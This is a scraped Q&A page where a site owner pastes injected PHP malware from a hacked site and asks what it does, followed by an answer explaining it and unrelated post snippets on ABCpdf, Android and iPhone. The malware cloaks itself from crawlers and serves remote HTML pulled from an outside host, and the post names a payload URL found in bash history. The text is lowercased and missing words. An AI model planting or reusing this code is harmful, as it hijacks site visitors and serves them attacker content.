php - I was just hacked, but I don't know how or more importantly, why. Very odd code injected -


edit: work far.

i've found being download , ran in bash history:

http://notsoft.ru/glib

(safe view)

thanks all

i've noticed source php of site has been edited. i've no idea how (i've changed passwords since) what's confuses me why.

in couple of pages there iframe placed, linking xml.php file placed in images directory (the directory accessible htaccess. code must have been hand placed pages complex , auto place without braking these pages have been near impossible.

now really confusing thing contents of xml.php file, can see nothing.

here's code:

<?php  $urlips = "http://mp3magicmag.com/frame/ips.txt"; // url ip's $urlhtml = "http://mp3magicmag.com/frame/html.code"; // url html.code $urlua = "http://mp3magicmag.com/frame/ua.txt"; // url user agent file  if(isset($_get['ping'])){     echo "status: ping successful!"; die; } $ip = $_server['remote_addr']; //orezaem deapozona $exips = explode(".", $ip);  $ip = $exips[0].".".$exips[1].".".$exips[2];  $ips = file_get_contents($urlips);  if(strpos(" ".$ips, $ip)){ // esli nashli ip v file ostanavlivaem process..     die; }  $arrua = file($urlua); for($ua=0; $ua<count($arrua); $ua++){     $useragent = trim($arrua[$ua]);     if(strpos(" ".$_server['http_user_agent'], $useragent)){ // esli nashli v user agent'e ostanavlivaem process..         die;     } }   if(isset($_cookie['pingshell'])){ // proveriaem est' li kuki      echo @file_get_contents($urlhtml);  }else{  ?> <script language="javascript"> function setcookie (name, value, expires, path, domain, secure) {       document.cookie = name + "=" + escape(value) +     ((expires) ? "; expires=" + expires : "") +     ((path) ? "; path=" + path : "") +     ((domain) ? "; domain=" + domain : "") +     ((secure) ? "; secure" : ""); } </script>  <script language="javascript"> setcookie("pingshell", "12345", "mon, 01-jan-2099 00:00:00 gmt", "/"); </script> <meta http-equiv="refresh" content="2; url=">  <?php } ?>

am missing something, or strangest "hack" ever?? i've done googling , can't find reference happening before.

right follows.

  1. checks see if script called ping if replies , terminates
  2. downloads list of valid server ips , checks request came one, terminates if not.
  3. downloads list of user-agent strings , matches browser against see if valid, if not terminates.
  4. if cookie pingshell has been set html file downloaded , displayed browser
  5. otherwise cookie script sent browser, setting pingshell cookie dummy value, valid entire domain.

step 4 important bit, looks proxy server retrieve html @ location given. if link illegal, it's not good. marketing purposes though, can use url serve content , users click-through data.

having said code allows form of access prescribed ip addresses, unless capturing information first, seems designed specific use specific people.


Comments

Post a Comment

Popular posts from this blog

asp.net - repeatedly call AddImageUrl(url) to assemble pdf document -

i'm using abcpdf , i'm curious if can recursively call addimageurl() function assemble pdf document compile multiple urls? something like: int pagecount = 0; int theid = thedoc.addimageurl("http://stackoverflow.com/search?q=abcpdf+footer+page+x+out+of+", true, 0, true); //assemble document while (thedoc.chainable(theid)) { thedoc.page = thedoc.addpage(); theid = thedoc.addimagetochain(theid); } pagecount = thedoc.pagecount; console.writeline("1 document page count:" + pagecount); //flatten document (int = 1; <= pagecount; i++) { thedoc.pagenumber = i; thedoc.flatten(); } //now try again theid = thedoc.addimageurl("http://stackoverflow.com/questions/1980890/pdf-report-generation", true, 0, true); //assemble document while (thedoc.chainable(theid)) { thedoc.page = thedoc.addpage(); theid = thedoc.addimagetoc
Read more

java - Android recognize cell phone with keyboard or not? -

in android app, want detect user's device if device has keyboard(like motorola milestone) , show corresponding user interface. guys know how that? ! regards justicepenny http://developer.android.com/reference/android/content/res/configuration.html public int keyboard the kind of keyboard attached device. 1 of: keyboard_nokeys, keyboard_qwerty, keyboard_12key. that's it!
Read more

iphone - How would you achieve a LED Scrolling effect? -

how achieve led scrolling effect example below? led sign - led ticker emulator iphone , ipad http://img.skitch.com/20101201-rsfh4p1bajb1wp94k466pdpiuj.preview.jpg sometimes remunerates comment in other posts :) have put code you, should implement font '8pin matrix' realistic feeling. uilabel *label; - (void)viewdidload { [super viewdidload]; label = [[uilabel alloc]initwithframe:cgrectmake(10, 50, 300, 20)]; label.font = [uifont fontwithname:@"courier-bold" size:16.0]; label.backgroundcolor = [uicolor blackcolor]; label.textcolor = [uicolor greencolor]; label.linebreakmode = uilinebreakmodecharacterwrap; // otherwise "…" label.text = @"this led text scrolled "; // blanks space between [self.view addsubview:label]; [nstimer scheduledtimerwithtimeinterval:0.12f target:self selector:@selector(scrolllabel) use
Read more